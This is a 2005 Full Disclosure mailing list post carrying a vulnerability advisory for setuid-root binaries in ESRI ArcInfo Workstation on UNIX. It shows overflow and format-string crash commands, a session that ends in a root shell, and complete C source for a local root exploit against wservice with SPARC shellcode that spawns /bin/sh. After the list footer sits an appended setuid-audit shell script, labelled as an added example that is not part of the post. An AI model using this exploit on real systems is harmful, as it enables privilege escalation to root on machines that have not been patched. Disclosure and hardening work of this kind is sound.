Full Disclosure mailing list archives

Re: DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
From: "KF (lists)" <kf_lists () digitalmunition com>
Date: Tue, 24 May 2005 12:50:26 -0400

Esri has posted a version 8.3 patch to their web site:

http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1020

This patch should address the problems that I outlined in version 9.x.
-KF


KF (lists) wrote:


------------------------------------------------------------------------

DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
Author: Kevin Finisterre
Vendor: http://www.esri.com/, http://www.esri.com/software/arcgis/arcinfo/index.html
Product: 'ArcInfo Workstation for UNIX'
References: http://www.digitalmunition.com/DMA[2005-0425a].txt

Description: On any given day, more than 1,000,000 people around the world use ESRI's GIS to improve the way their organizations conduct business.

ESRI software is used by more than 300,000 organizations worldwide including most U.S. federal agencies and national mapping agencies, 45 of the top 50 petroleum companies, all 50 U.S. state health departments, most forestry companies, and many others in dozens of industries.

ESRI software is the standard in state and local government and is used by more than 24,000 state and local governments including Paris, France; Los Angeles, California, USA; Beijing, China; and Kuwait City, Kuwait.

ESRI ArcGIS is an integrated collection of GIS software products for building a complete GIS. ArcGIS enables users to deploy GIS functionality wherever it is needed in desktops, servers, or custom applications; over the Web; or in the field.

Several local overflows and format string conditions have been found in the Unix versions of ESRI
ArcGIS products. ESRI Staff has promptly responded to and fixed the issues mentioned below. Patches
for ArcGIS 9.x will be available at the time this advisory is published.
(http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015)

Our testing was performed against ARCInfo Workstation 9 on two of ESRI's supported UNIX platforms. We have currently only tested IRIX 6.5 and Solaris 10 (beta). All UNIX ArcInfo installs are believed to be impacted by these vulnerabilities. It is currently unknown how older versions of ArcGIS are affected by these bugs. ESRI has stated that fixes for 8.x are forthcoming, so I can only assume exploitation is similar for this particular version. The vulnerable binaries can be found in <install path>/bin. The files are both setuid and setgid, so they should be easily found during a routine setuid scan using the unix find utility. I was not able to exploit ALL of the binaries I found; however, it is likely that more vulns could be discovered.

10 setuid root binaries are provided with the install of ARCInfo:
-bash-2.05b$ pwd
/export/home/arcgis/arcexe9x/bin

SunOS:
-bash-2.05b$ ls -al `find . -perm -4000 `
-rwsr-sr-x   1 root     nuucp      56772 Mar  5  2004 ./abservice
-rwsr-sr-x   1 root     nuucp    4601408 Mar  5  2004 ./arcrqmgr
-rwsr-sr-x   1 root     nuucp    2311796 Mar  5  2004 ./asbuild
-rwsr-sr-x   1 root     nuucp    2817120 Mar  5  2004 ./asmaster
-rwsr-sr-x   1 root     nuucp    7988480 Mar  5  2004 ./asrecovery
-rwsr-sr-x   1 root     nuucp    8240340 Mar  5  2004 ./asuser
-rwsr-sr-x   1 root     nuucp    2765020 Mar  5  2004 ./asutility
-rwsr-sr-x   1 root     nuucp      75904 Mar  5  2004 ./lockmgr
-rwsr-sr-x   1 root     nuucp    5652228 Mar  5  2004 ./se
-rwsr-sr-x   1 root     nuucp      81332 Mar  5  2004 ./wservice

SGI:
station0 515# ls -al `find . -perm -4000`
-rwsr-sr-x    1 root     lp           44648 Mar  9  2004 ./abservice
-rwsr-sr-x    1 root     lp         5920592 Mar  9  2004 ./arcrqmgr
-rwsr-sr-x    1 root     lp         2508552 Mar  9  2004 ./asbuild
-rwsr-sr-x    1 root     lp         3263552 Mar  9  2004 ./asmaster
-rwsr-sr-x    1 root     lp         9758516 Mar  9  2004 ./asrecovery
-rwsr-sr-x    1 root     lp        10065284 Mar  9  2004 ./asuser
-rwsr-sr-x    1 root     lp         3229812 Mar  9  2004 ./asutility
-rwsr-sr-x    1 root     lp           83260 Mar  9  2004 ./lockmgr
-rwsr-sr-x    1 root     lp         6926980 Mar  9  2004 ./se
-rwsr-sr-x    1 root     lp           83180 Mar  9  2004 ./wservice

For some reason the binaries are setgid (9). On our SunOS and IRIX boxes
this group corresponded respectively with nuucp and lp.

Some of the vulnerabilities will require a properly working license and license manager:

-bash-2.05b# export LM_LICENSE_FILE=/export/home/arcgis/arcexe9x/sysgen/license.dat
-bash-2.05b# ps -ef | grep lmgr | grep -v grep
   root  1294     1   0 18:14:44 pts/3       0:00 ./lmgrd -c ./license.dat

During exploitation you may see license requests mixed in with the application responses.

18:27:29 (ARCGIS) IN: "ArcStormEnable" kf () ims0
18:27:29 (ARCGIS) OUT: "ArcStormEnable" kf () ims0

A cursory audit of the above listed applications revealed the following
flaws.

Both lockmgr and wservice are vulnerable to a format string attack.

-bash-2.05b$ export ARCHOME=AAAABBBB%x.%x.%x.%x

-bash-2.05b$ ./wservice
Can not find or access
AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!

-bash-2.05b# export ARCHOME=%x.%x.%x.%x
-bash-2.05b# ./lockmgr
Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!

asmaster is vulnerable to a buffer overflow attack

-bash-2.05b#  ./asmaster `perl -e 'print "A" x 2285'` b
FATAL ERROR
Segment Violation

-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
FATAL ERROR
Segment Violation

asutility has multiple overflows

-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
FATAL ERROR
Segment Violation

-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
FATAL ERROR
Segment Violation

-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x 804'`
FATAL ERROR
Segment Violation

Please note that asutility has several other overflows. Listing them all is a bit redundant.

se is subject to a buffer overflow

-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
FATAL ERROR
Segment Violation

asrecovery is subject to a buffer overflow

-bash-2.05b# ./asrecovery  `perl -e 'print "A" x 1987'` a a a
FATAL ERROR
Segment Violation

In order to show that these issues do indeed pose a security risk we have created a PoC for the
format string conditions in wservice and lockmgr. This exploit was tested on the Solaris platform;
however, exploitation on other platforms should be trivial.

-bash-2.05b$ ./ex_ARC_wservice
Can not find or access ZAAAAÿ>¢4BBBBÿ>¢67ffffc000002a0780009e39c00000615ff330c5cff330ba00000001000000001ff3033e8ff3ed86cffd
fffffff3ea9d8ffffff7fffbff4c0ff3be2bcffbff4c0ff3be2100000000000000000000000000000000000000007ff330c5
80000000100000007ff3ea9d8ff3ea1140000000010000000ff3ecc30ff3ea108ff3ea1a800c1004000000602ff3ea108000
00000ff330c580000060200c100c0ffbff618ff3cba180000000000000000000000000000000000000000000000000000000
00001b8cc0001273c000100000001b8ccff3ecbd000000002ffbff7f8ffbff7b400000000ff3ec4f800019de700000000000
100940000000000000000ff3ecbd00002a48000000020ff3b00006ffffffd000000000000000000000000000000000000001
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000900000000000000000000000000013db40000000041f7286533a121f0404919490000000041f7082825e36eb00000200
0000000a075667300000000000000000000000000000000000001179fff3ecc30ff33072800000016ff330a3c00000000000
00000ffffffffffffffffffffffffffffffffffffffffff3b000000000003ff3ea10800010034ffffffffffbff7acff3b000
043616e206e6f742066696e64206f7220616363657373205a000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000004141414100000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004
2424242¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () 
¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢
@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () 
¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢
@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () 
¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢
@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () 
¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢
@¢ () ¢@¢@ ÊÐ?@ ËÐ!

 Ù !v#

      Ý¢`yà;¿ø# Ð  )Ð!
             Ø !n#
                  ËÜ¢chà;¿ðÀ#¿ø# À#¿ìÐ#¿è# ?"
?@ ;Рпÿß - wservice not run!
# id
uid=0(root) gid=0(root)

Workaround:
chmod -s the above mentioned setuid files or apply the patches supplied by ESRI, which can be located at http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015

This is the basic timeline associated with this bug.
01/18/2005 assigned case #409658, Jeremy W takes ownership of the technical support incident
01/18/2005 Jeremy W logged this vulnerability as defect number CQ00261045
01/26/2005 Johnh exploited the bug on Solaris
--/--/---- Multiple communications involving the issues at hand over a several month period
04/11/2005 Bug patches provided to KF for testing
04/27/2005 Fixes have been tested and verified
04/30/2005 Public disclosure.

As mentioned above, ESRI was very prompt in addressing and fixing the issues at hand. Since the discovery of these bugs ESRI has attempted to proactively prevent future exploits from occurring.
-KF


------------------------------------------------------------------------

/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
** Bug found by Kevin Finisterre <kf () digitalmunition com>
** Exploit by John H. <johnh () digitalmunition com>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/


#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP                     "\xa2\x1c\x40\x11"
int             iType;


struct
{
        unsigned long retloc;
        unsigned long retaddr;
       char          *type;
}targets[] =
{

       /* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
           0003a234 d thr_jmp_table
        */
        {0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
        {0x41424344,0x41424344,"DEBUG"},
         },v;







//shellcode taken from netric
char shellcode[] =
"55"

NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP

// setreuid(0,0); "\x90\x1d\x80\x16" // xor %l6, %l6, %o0
        "\x92\x1d\x80\x16"    // xor  %l6, %l6, %o1
        "\x82\x10\x20\xca"    // mov  0xca, %g1
        "\x91\xd0\x20\x08"    // ta  8

        "\x90\x1d\x80\x16"      // xor          %l6, %l6, %o0
       "\x92\x1d\x80\x16"      // xor          %l6, %l6, %o1
       "\x82\x18\x40\x01"      // xor          %g1, %g1, %g1
       "\x82\x10\x20\xcb"      // mov          0x2e, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [setregid(0,0)]

       "\x21\x0b\xd9\x19"      // sethi        %hi(0x2f646400), %l0
       "\xa0\x14\x21\x76"      // or           %l0, 0x176, %l0
       "\x23\x0b\xdd\x1d"      // sethi        %hi(0x2f747400), %l1
       "\xa2\x14\x60\x79"      // or           %l1, 0x79, %l1
       "\xe0\x3b\xbf\xf8"      // std          %l0, [ %sp - 0x8 ]
       "\x90\x23\xa0\x08"      // sub          %sp, 8, %o0
       "\x92\x1b\x80\x0e"      // xor          %sp, %sp, %o1
       "\x82\x10\x20\x05"      // mov          0x05, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [open("/dev/tty",RD_ONLY)]

       "\x90\x10\x20\x02"      // mov          0x02, %o0
       "\x82\x10\x20\x29"      // mov          0x29, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [dup(2)]

       "\x21\x0b\xd8\x9a"      // sethi        %hi(0x2f626800), %l0
       "\xa0\x14\x21\x6e"      // or           %l0, 0x16e, %l0
       "\x23\x0b\xcb\xdc"      // sethi        %hi(0x2f2f7000), %l1
       "\xa2\x14\x63\x68"      // or           %l1, 0x368, %l1
       "\xe0\x3b\xbf\xf0"      // std          %l0, [ %sp - 0x10 ]
       "\xc0\x23\xbf\xf8"      // clr          [ %sp - 0x8 ]
       "\x90\x23\xa0\x10"      // sub          %sp, 0x10, %o0
       "\xc0\x23\xbf\xec"      // clr          [ %sp - 0x14 ]
       "\xd0\x23\xbf\xe8"      // st           %o0, [ %sp - 0x18 ]
       "\x92\x23\xa0\x18"      // sub          %sp, 0x18, %o1
       "\x94\x22\x80\x0a"      // sub          %o2, %o2, %o2
       "\x82\x18\x40\x01"      // xor          %g1, %g1, %g1
       "\x82\x10\x20\x3b"      // mov          0x3b, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [execve("/bin/sh","/bin/sh",NULL)]

       "\x82\x10\x20\x01"      // mov          0x01, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [exit(?)]

       "\x10\xbf\xff\xdf"      // b            shellcode
       "\x90\x1d\x80\x16";     // or           %o1, %o1, %o1








/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
   *ptr++ = (char) (value >> 24) & 0xff;
   *ptr++ = (char) (value >> 16) & 0xff;
   *ptr++ = (char) (value >> 8) & 0xff;
   *ptr++ = (char) (value >> 0) & 0xff;

   return ptr;
}

/* main */
int main(int argc, char **argv)
{

   unsigned long retaddr;
   unsigned long retloc;
   int offset = 23;
   int dump_fmt=129;
   int al = 1;
   int i=0;
   int x=0;
   int c;
   unsigned long hi,lo;
   static unsigned long shift0,shift1;
   char    buf[9000];
   char    *args[24];
   char    *env[6];
   char            *ptr;
   char            padding[64];
   char            padding1[64];
   char     buf2[9000];

   if (argc < 3) {
               usage (argv[0]);
               return -1;
       }

     while((c = getopt(argc, argv, "h:t:")) != EOF) {
               switch(c) {
                       case 'h':
                               usage (argv[0]);
                               return 0;
                       case 't':
                               iType = atoi (optarg);
                               break;
                       default:
                               usage (argv[0]);
                               return 0;
               }
       }



if (argc < 2) { usage(argv[0]); exit(1); }

   if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
   {
       usage(argv[0]);
       printf("[-] Invalid type.\n");
       return 0;
}







   env[0] = shellcode;
   env[1] = buf2;
   env[2] = NULL;

   args[0] = VULPROG;
   args[1] = NULL;



retloc = targets[iType].retloc;
  retaddr = targets[iType].retaddr;



   hi = (retaddr >> 16) & 0xffff;
   lo = (retaddr >> 0) & 0xffff;

   shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
   shift1 = (0x10000 +  lo) - hi;

   memset(buf,0x00,sizeof(buf));
memset(buf2,0x00,sizeof(buf2)); ptr = buf;

    for (i = 0; i < al; i++) {
               *ptr++ = 0x41;
       }

   ptr = putLong (ptr, 0x41414141);
   ptr = putLong (ptr, retloc);
   ptr = putLong (ptr, 0x42424242);
   ptr = putLong (ptr, retloc+2);

   for (i = 0 ; i < dump_fmt; i ++) {
               memcpy(ptr, "%.8x", 4);
               ptr = ptr + 4;
    }





   strcat(ptr,"%.");
 sprintf(ptr+strlen(ptr),"%u",shift0);
  strcat(ptr,"lx%hn");

  strcat(ptr,"%.");
   sprintf(ptr+strlen(ptr),"%u",shift1);
   strcat(ptr,"lx%hn");

   strcat(buf2,"ARCHOME=");
   memcpy(buf2+strlen(buf2),buf,strlen(buf));



   execve (args[0], args, env);
   perror ("execve");
 return 0;
}

int usage(char *p)
{
   int     i;
   printf( "Arcgis local root format string exploit\r\n");
   printf( "Usage: %s <-t target>\n",p);
   for(i=0;i<sizeof(targets)/sizeof(v);i++)
   {
       printf("%d\t%s\n", i, targets[i].type);
   }
   return 0;
}

------------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
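The advisory's detection step (a routine setuid scan with the unix find utility) and its workaround (chmod -s on the ten setuid/setgid binaries) written out as a small POSIX shell audit. This is an added example, not code from KF's post or from ESRI; the default path /export/home/arcgis/arcexe9x/bin is taken from the advisory's own session and is an assumption for any other install, so pass the real bin directory as the first argument. The listing is sorted so a run can be diffed against the ten names in the advisory or against a baseline from before a vendor update re-adds the bits.

```shell
#!/bin/sh
# Added example, not part of the advisory: audit a directory for setuid/setgid
# binaries and optionally apply the advisory's "chmod -s" workaround.
# Default path is assumed from the advisory's session; pass another as $1.

ARC_BIN_DEFAULT=/export/home/arcgis/arcexe9x/bin

# List every regular file under $1 carrying the setuid (4000) or setgid (2000)
# bit, one path per line, sorted so two runs can be diffed against a baseline.
list_privileged_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print | sort
}

# Number of such files; prints 0 (and exits 0) when there are none.
count_privileged_files() {
    list_privileged_files "$1" | wc -l | tr -d ' '
}

# Show owner, group and mode for each hit so the reviewer can see which
# group (nuucp or lp in the advisory's listings) the setgid bit grants.
report_privileged_files() {
    list_privileged_files "$1" | while IFS= read -r f; do
        ls -ld "$f"
    done
}

# Apply the workaround: clear setuid and setgid on every hit under $1.
# Prints the number of files whose bits were removed.
strip_privileged_bits() {
    before=$(count_privileged_files "$1")
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -exec chmod u-s,g-s '{}' +
    after=$(count_privileged_files "$1")
    echo $((before - after))
}

# Command-line use: audit_setuid.sh [bin-dir] [--fix]
# Without --fix the script only reports; with it, the bits are stripped.
dir=${1:-$ARC_BIN_DEFAULT}
if [ -d "$dir" ]; then
    report_privileged_files "$dir"
    if [ "${2:-}" = "--fix" ]; then
        echo "stripped setuid/setgid from $(strip_privileged_bits "$dir") file(s)"
    fi
fi
```

Run it once to record the baseline, and again after applying the ESRI patch: the vendor fix keeps the binaries privileged, so the audit is also the quickest way to confirm that a later reinstall or service pack has not silently restored bits on a host where the workaround was chosen instead.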